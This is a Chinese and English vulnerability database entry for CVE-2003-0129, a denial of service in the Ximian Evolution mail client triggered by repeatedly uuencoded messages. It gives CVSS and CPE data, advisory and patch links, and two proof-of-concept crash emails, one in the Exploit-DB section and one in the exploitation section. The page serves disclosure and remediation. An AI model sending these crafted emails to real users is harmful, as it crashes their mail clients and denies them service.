CVE-2003-0129
CVSS5.0
发布时间 :2003-03-24 00:00:00
修订时间 :2016-10-17 22:29:53
NMCOES    

[原文]Ximian Evolution Mail User Agent 1.2.2 and earlier allows remote attackers to cause a denial of service (memory consumption) via a mail message that is uuencoded multiple times.


[CNNVD]Ximian Evolution UUEncoding远程拒绝服务攻击漏洞(CNNVD-200303-073)

        
        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution在解析多次'uuencode'编码的内容时存在问题,远程攻击者可以利用这个漏洞对系统进行拒绝服务攻击。
        Evolution mailer在处理多次uuencode编码后的邮件内容时会消耗大量资源,MUA会尝试分配大量内存直到MUA崩溃,3次uuedcode可能导致系统由于资源耗竭而崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ximian:evolution:1.2
cpe:/a:ximian:evolution:1.0.8
cpe:/a:ximian:evolution:1.0.4
cpe:/a:ximian:evolution:1.2.2
cpe:/a:ximian:evolution:1.0.7
cpe:/a:ximian:evolution:1.0.5
cpe:/a:ximian:evolution:1.0.3
cpe:/a:ximian:evolution:1.2.1
cpe:/a:ximian:evolution:1.0.6
cpe:/a:ximian:evolution:1.1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:108Ximian Evolution User Agent Multiple uuencoding Denial of Service
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0129
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0129
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-073
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0141.html
(UNKNOWN)  BUGTRAQ  20030319 CORE-2003-03-04-01: Multiple vulnerabilities in Ximian 's Evolution Mail User Agent
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000648
(UNKNOWN)  CONECTIVA  CLA-2003:648
http://marc.info/?l=bugtraq&m=104826470527308&w=2
(UNKNOWN)  BUGTRAQ  20030321 GLSA: evolution (200303-18)
http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
(VENDOR_ADVISORY)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
http://www.gentoo.org/security/en/glsa/glsa-200303-18.xml
(UNKNOWN)  GENTOO  GLSA-200303-18
http://www.mandriva.com/security/advisories?name=MDKSA-2003:045
(UNKNOWN)  MANDRAKE  MDKSA-2003:045
http://www.redhat.com/support/errata/RHSA-2003-108.html
(UNKNOWN)  REDHAT  RHSA-2003:108
http://www.securityfocus.com/bid/7118
(VENDOR_ADVISORY)  BID  7118

- 漏洞信息

Ximian Evolution UUEncoding远程拒绝服务攻击漏洞
中危 其他
2003-03-24 00:00:00 2005-10-20 00:00:00
远程  
        
        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution在解析多次'uuencode'编码的内容时存在问题,远程攻击者可以利用这个漏洞对系统进行拒绝服务攻击。
        Evolution mailer在处理多次uuencode编码后的邮件内容时会消耗大量资源,MUA会尝试分配大量内存直到MUA崩溃,3次uuedcode可能导致系统由于资源耗竭而崩溃。
        

- 公告与补丁

        厂商补丁:
        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2003:108-01)以及相应补丁:
        RHSA-2003:108-01:Updated Evolution packages fix multiple vulnerabilities
        链接:https://www.redhat.com/support/errata/RHSA-2003-108.html
        补丁下载:
        Red Hat Upgrade evolution-1.0.8-11.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm
        Red Hat Linux 8.0
        Red Hat Upgrade evolution-1.0.8-9.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-devel-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade libgal19-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm
        Ximian
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载1.2.3版本:
        
        http://www.ximian.com/products/ximian_evolution/

- 漏洞信息 (22369)

Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability (EDBID:22369)
linux remote
2003-03-17 Verified
0 Core Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/7117/info

The Evolution mail client supports "uuencoded" content and decodes it automatically when a message is initially parsed. A memory corruption error is present in the parsing component that can result in the client crashing when specially malformed content is decoded. The presence of such a message in an Evolution user's mailbox may result in a prolonged denial of service as the crashing of the GUI may prevent deletion of the message. The user will also not be able to read messages while the message is present in their mailbox. It is not yet determined whether this vulnerability may be exploited by remote attackers to compromise client hosts. Users are advised to upgrade despite this uncertainty.

The following email will reproduce this vulnerability, note that
an empty line is required before and after the UUE header line.

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600

end

--=-mTDu5zdJIsixETTwCF5Y--		

- 漏洞信息

9795
Ximian Evolution Mail User Agent UUencoded Mail DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Ximian Evolution contains a flaw that may allow a remote denial of service. The issue is triggered when a mail message in the inbox contains multiple UUencoded strings occurs, and will result in loss of availability for the platform.

- 时间线

2003-03-19 2003-05-17
2003-05-17 2003-03-19

- 解决方案

Upgrade to version 1.2.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ximian Evolution UUEncoding Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 7118
Yes No
2003-03-17 12:00:00 2009-07-11 09:06:00
Discovered by Diego Kelyacoubian, Javier Kohen, Alberto Solino, and Juan Vera of Core Security Technologies.

- 受影响的程序版本

Ximian Evolution 1.2.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ RedHat Linux 9.0 i386
Ximian Evolution 1.2.1
Ximian Evolution 1.2
Ximian Evolution 1.1.1
Ximian Evolution 1.0.8
+ Mandriva Linux Mandrake 9.0
Ximian Evolution 1.0.7
Ximian Evolution 1.0.6
Ximian Evolution 1.0.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Ximian Evolution 1.0.4
Ximian Evolution 1.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ RedHat Linux 7.3
Ximian Evolution 1.2.3

- 不受影响的程序版本

Ximian Evolution 1.2.3

- 漏洞讨论

A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash.

This vulnerability affects Ximian Evolution version 1.2.2 and earlier.

- 漏洞利用

The following proof of concept vulnerability will reproduce the issue:

From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X &lt;xxx@corest.com&gt;
To: xxx@corest.com
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Message-Id: &lt;1046884154.1731.5.camel@vaiolin&gt;
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=3D-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
Content-Transfer-Encoding: 7bit

begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"&lt;Q13XG,"HS,RA&amp;+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A-
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@

end
--=3D-mTDu5zdJIsixETTwCF5Y--

- 解决方案

Red Hat has released a security advisory (RHSA-2003:108-01) which contains fixes for this issue. Users are advised to upgrade as soon as possible.

The appropriate fixes have been applied to the Evolution CVS tree.

Ximian has reported that Evolution 1.2.3 will be released however, it does not appear to be available at this time. Users are advised to monitor the Ximian Evolution release page for further information.

Conectiva Linux has released an advisory. Affected users are advised to upgrade to new versions of Evolution. Further information about obtaining and applying fixes are available in the referenced advisory.


Ximian Evolution 1.0.3

Ximian Evolution 1.0.8

Ximian Evolution 1.2.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站